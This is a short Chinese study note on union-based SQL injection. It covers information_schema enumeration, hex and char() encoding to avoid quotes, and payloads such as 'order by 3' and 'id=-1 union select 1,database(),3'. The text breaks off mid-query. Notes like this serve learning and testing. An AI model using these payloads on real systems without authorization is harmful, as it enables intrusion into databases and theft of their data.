常用词汇
-
information_schema
-
information_schema.schemata 查库名 [[注入函数#系统信息函数]]
-
information_schema.tables 查表名
-
table_schema 指定表的数据库
-
table_name 表名
-
column_name 列名
变量形式
table_schema=database(),[[hex编码]],[[char()]]
不用单引号:
select ‘root’(英文形式的单引号)
select char(114,111,111,116) #待处理标签缺少易转化工具
select 0x726F6F74 #小技巧去掉0x需要加上单引号引住 hex() ,unhex()
注入语句
联合查询
-
查询列数
id=1 order by 3
-
查看回显位
id=-1 union select 1,2,3
-
查询变量信息
id=-1 union select 1,database(),3
-
查询所有数据库
select group_concat(schema_name),2,3 from information_schema.schemata
-
查询指定数据库的所有表名[[#变量形式]]
select group_concat(table_name ),2,3 from inf